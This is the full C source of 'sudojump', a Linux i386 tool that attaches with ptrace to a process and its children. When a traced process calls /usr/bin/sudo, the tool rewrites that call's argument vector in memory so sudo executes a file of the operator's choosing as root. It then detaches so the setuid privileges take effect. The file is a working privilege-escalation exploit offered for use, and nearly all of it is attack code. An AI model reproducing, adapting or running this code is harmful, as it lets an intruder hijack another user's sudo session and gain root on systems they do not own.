#include <errno.h>
#include <getopt.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <linux/user.h>

// size of the buffer that holds the path copied out of a traced execve call
#define MAX_PATH 1024
// capacity of the argument pointer/string tables copied out of a traced execve call
#define MAX_ARGS 128
// capacity of the attached_pids table
#define MAX_ATTACHED_PIDS 1024
// number of leading slots of attached_pids that are in use
int num_attached_pids = 0;
// pids we are currently attached to; a slot holding 0 has been detached
pid_t attached_pids[MAX_ATTACHED_PIDS];

// Releases every process that is still recorded in attached_pids.
// Slots that were already cleared to 0 are skipped. The table itself is
// left untouched, so this is suitable as an atexit handler.
void detach(void) {
    const pid_t *slot;

    for (slot = attached_pids; slot < attached_pids + num_attached_pids; slot++) {
        if (*slot == 0)
            continue;
        ptrace(PTRACE_DETACH, *slot, 0, 0);
    }
}

// Detaches from a single traced process and removes it from the table.
//
// Every slot holding `pid` is cleared to 0 and a PTRACE_DETACH is issued for
// it; the result of the detach is not checked. Afterwards any run of empty
// slots at the end of the table is trimmed so num_attached_pids shrinks again.
void detach_pid(pid_t pid) {
    int i;
    for (i = 0; i < num_attached_pids; i++) {
        if (attached_pids[i] == pid) {
            attached_pids[i] = 0;
            ptrace(PTRACE_DETACH, pid, 0, 0);
        }
    }

    // The count must be checked first: once the last live entry is gone the
    // table is empty and there is no attached_pids[-1] to look at.
    while (num_attached_pids > 0 && attached_pids[num_attached_pids - 1] == 0)
        num_attached_pids--;
}

// Starts tracing `pid` and appends it to attached_pids.
//
// Prints a message to stderr and leaves the count unchanged when the table
// is full or when PTRACE_ATTACH fails. Callers detect success by watching
// num_attached_pids.
void attach(pid_t pid) {
    const int slot = num_attached_pids;

    if (slot == MAX_ATTACHED_PIDS) {
        fprintf(stderr, "cannot attach to anymore pids\n");
        return;
    }

    // The pid is written before attaching; the slot only becomes visible to
    // the other helpers once the count is bumped below.
    attached_pids[slot] = pid;

    if (ptrace(PTRACE_ATTACH, pid, 0, 0) != -1) {
        num_attached_pids = slot + 1;
        return;
    }

    fprintf(stderr, "error attaching to pid %i\n", pid);
}

// Writes the program name and version to stdout.
void version() {
    fputs("sudojump version 0.1\n", stdout);
}

// Writes the command-line synopsis and option summary to stdout.
void usage() {
    static const char *const help_lines[] = {
        "usage: sudojump [-d] [-v] [-h] <pid> <file to exec>\n",
        "    -d drop original arguments.\n",
        "    -v prints version info.\n",
        "    -h prints this help.\n",
        "\n",
    };
    size_t n;

    for (n = 0; n < sizeof help_lines / sizeof help_lines[0]; n++)
        fputs(help_lines[n], stdout);
}

// Reads the byte at `addr` in the stopped tracee `pid` into *out.
// PTRACE_PEEKTEXT returns the data itself, so a result of -1 is only an
// error when errno was set as well. Returns 0 on success, -1 on failure.
static int peek_byte(pid_t pid, unsigned long addr, unsigned char *out)
{
    errno = 0;
    long word = ptrace(PTRACE_PEEKTEXT, pid, (void *)addr, NULL);
    if (word == -1 && errno != 0)
        return -1;
    *out = (unsigned char)(word & 0xff);
    return 0;
}

// Reads the 32-bit value at `addr` in the stopped tracee `pid` into *out.
// Returns 0 on success, -1 on failure.
static int peek_u32(pid_t pid, unsigned long addr, unsigned int *out)
{
    errno = 0;
    long word = ptrace(PTRACE_PEEKTEXT, pid, (void *)addr, NULL);
    if (word == -1 && errno != 0)
        return -1;
    *out = (unsigned int)word;
    return 0;
}

// Writes one machine word to `addr` in the stopped tracee `pid`.
// Returns the ptrace result (-1 on failure).
static long poke_word(pid_t pid, unsigned long addr, unsigned long word)
{
    return ptrace(PTRACE_POKETEXT, pid, (void *)addr, (void *)word);
}

// Copies the NUL-terminated string at `addr` in the tracee into a freshly
// malloc'd buffer owned by the caller. An unreadable byte is treated as the
// end of the string. Returns NULL only when the allocation fails.
static char *dup_tracee_string(pid_t pid, unsigned long addr)
{
    size_t len = 0;
    size_t k;
    unsigned char byte;

    while (peek_byte(pid, addr + len, &byte) == 0 && byte != 0)
        len++;

    char *copy = malloc(len + 1);
    if (copy == NULL)
        return NULL;

    // The copy is bounded by the measured length so the buffer can never be
    // overrun, even if the tracee's memory changed between the two passes.
    for (k = 0; k < len; k++) {
        if (peek_byte(pid, addr + k, &byte) != 0)
            byte = 0;
        copy[k] = (char)byte;
    }
    copy[len] = '\0';
    return copy;
}

// Handles a stop on execve (i386: path in ebx, argv in ecx).
//
// Prints the call, and when the target is /usr/bin/sudo with a first argument
// that is not an option, rewrites the tracee's argv on its stack so that
// `jumpto` is inserted as argv[1] (followed by the original arguments unless
// `droporiginalargs` is set). If the executable is setuid/setgid the tracee
// is detached so the kernel honours those bits.
//
// Returns 1 when the tracee was detached (and must not be resumed by the
// caller), 0 otherwise.
static int handle_execve(pid_t pid, struct user_regs_struct *regs,
                         const char *jumpto, int droporiginalargs)
{
    char path[MAX_PATH];
    unsigned int argptrs[MAX_ARGS];
    char *args[MAX_ARGS];
    int argcount;
    int detached = 0;
    int i;

    // get the path of the file to be executed (truncated to MAX_PATH - 1)
    for (i = 0; i < MAX_PATH - 1; i++) {
        unsigned char byte;
        if (peek_byte(pid, (unsigned long)regs->ebx + (unsigned long)i, &byte) != 0 || byte == 0)
            break;
        path[i] = (char)byte;
    }
    path[i] = '\0';

    // get the pointers for the arguments being passed; an unreadable slot
    // ends the list just like the NULL terminator does
    for (i = 0; i < MAX_ARGS - 1; i++) {
        if (peek_u32(pid, (unsigned long)regs->ecx + (unsigned long)i * 4, &argptrs[i]) != 0)
            argptrs[i] = 0;
        if (argptrs[i] == 0)
            break;
    }
    argptrs[i] = 0;

    // now get the arguments
    for (i = 0; argptrs[i]; i++) {
        args[i] = dup_tracee_string(pid, argptrs[i]);
        if (args[i] == NULL) {
            fprintf(stderr, "out of memory\n");
            exit(1); // the atexit handler releases the tracees
        }
    }
    args[i] = NULL;
    argcount = i;

    // print out the path and the arguments, for reference
    printf("execve (%s)", path);
    for (i = 0; args[i]; i++) {
        if (i != 0)
            putchar(',');
        printf(" \"%s\"", args[i]);
    }
    printf("\n");

    // if the file being run is sudo, make it run our file instead.
    // forget about it if they're passing options (this is left as an
    // exercise to the reader) or if there is no first argument at all.
    if (!strcmp(path, "/usr/bin/sudo") && argcount >= 2 && args[1][0] != '-') {
        size_t jumplen = strlen(jumpto);
        size_t k;
        int failed = 0;

        // reserve room below the stack pointer for the string plus the new
        // argv: argv[0], jumpto, the original arguments and the terminator
        regs->esp -= (long)(jumplen + 1 + 4 * ((size_t)argcount + 2));
        unsigned long str_addr = (unsigned long)regs->esp;
        unsigned long argv_addr = str_addr + jumplen + 1;

        // each poke writes a whole word, so bytes are written low to high
        // and the NUL is written explicitly; the cast keeps high-bit
        // characters from sign-extending into the following bytes
        for (k = 0; k <= jumplen; k++)
            failed |= poke_word(pid, str_addr + k, (unsigned char)jumpto[k]) == -1;

        regs->ecx = (long)argv_addr;
        failed |= poke_word(pid, argv_addr, argptrs[0]) == -1;
        failed |= poke_word(pid, argv_addr + 4, str_addr) == -1;
        if (droporiginalargs) {
            failed |= poke_word(pid, argv_addr + 8, 0) == -1;
        } else {
            // argptrs[argcount] is 0, so this also writes the terminator
            for (i = 1; i < argcount + 1; i++)
                failed |= poke_word(pid, argv_addr + 4 + (unsigned long)i * 4, argptrs[i]) == -1;
        }

        // only point the tracee at the new argv if it was fully written
        if (failed)
            fprintf(stderr, "failed to rewrite arguments for pid %i\n", pid);
        else
            ptrace(PTRACE_SETREGS, pid, 0, regs);
    }

    // if the file being run is suid or sgid, we must detach now
    // otherwise it will not run with those permissions
    struct stat st;
    if (stat(path, &st) == 0 && (st.st_mode & (S_ISUID | S_ISGID))) {
        detach_pid(pid);
        detached = 1;
    }

    // free args
    for (i = 0; args[i]; i++)
        free(args[i]);

    return detached;
}

// Entry point: sudojump [-d] [-v] [-h] <pid> <file to exec>
//
// Attaches to <pid>, follows its children, and watches every syscall stop.
// The register names and syscall numbers used here are the i386 ones
// (2 = fork, 120 = clone, 11 = execve).
//
// Returns 1 on usage errors, after -v/-h, or when the initial attach fails;
// returns 0 once there is nothing left to wait for.
int main(int argc, char **argv)
{
    if (argc < 2) {
        usage();
        return 1;
    }

    int droporiginalargs = 0;

    int opt;
    while ((opt = getopt(argc, argv, "vdh")) != -1) {
        switch(opt) {
            case 'd':
                droporiginalargs = 1;
                break;
            case 'v':
                version();
                return 1;
            case 'h':
                usage();
                return 1;
            default:
                // getopt has already reported the unknown option
                usage();
                return 1;
        }
    }

    // both positional arguments are required
    if (optind + 1 >= argc) {
        usage();
        return 1;
    }

    char *end;
    long target = strtol(argv[optind], &end, 10);
    if (end == argv[optind] || *end != '\0' || target <= 0 ||
            (long)(pid_t)target != target) {
        fprintf(stderr, "invalid pid: %s\n", argv[optind]);
        return 1;
    }

    const char *jumpto = argv[optind + 1];

    attach((pid_t)target);
    if (num_attached_pids == 0)
        return 1;

    atexit(detach);

    ptrace(PTRACE_SYSCALL, attached_pids[0], 0, 0);

    for(;;) {
        int status;
        pid_t pid = wait(&status);
        if (pid == -1) {
            if (errno == EINTR)
                continue;
            // nothing left to wait for (or wait itself failed): stop
            // instead of spinning on an undefined status
            break;
        }

        if (!WIFSTOPPED(status))
            continue;

        struct user_regs_struct regs;
        if (ptrace(PTRACE_GETREGS, pid, 0, &regs) == -1) {
            // registers unavailable; just try to let the tracee run on
            ptrace(PTRACE_SYSCALL, pid, 0, 0);
            continue;
        }

        // fork/clone returning a positive value: follow the new child
        if ((regs.orig_eax == 2 || regs.orig_eax == 120) && regs.eax > 0)
            attach((pid_t)regs.eax);

        if (regs.orig_eax == 11 && regs.ecx) {
            // a detached tracee must not be resumed through ptrace
            if (handle_execve(pid, &regs, jumpto, droporiginalargs))
                continue;
        }

        ptrace(PTRACE_SYSCALL, pid, 0, 0);
    }

    return 0;
}

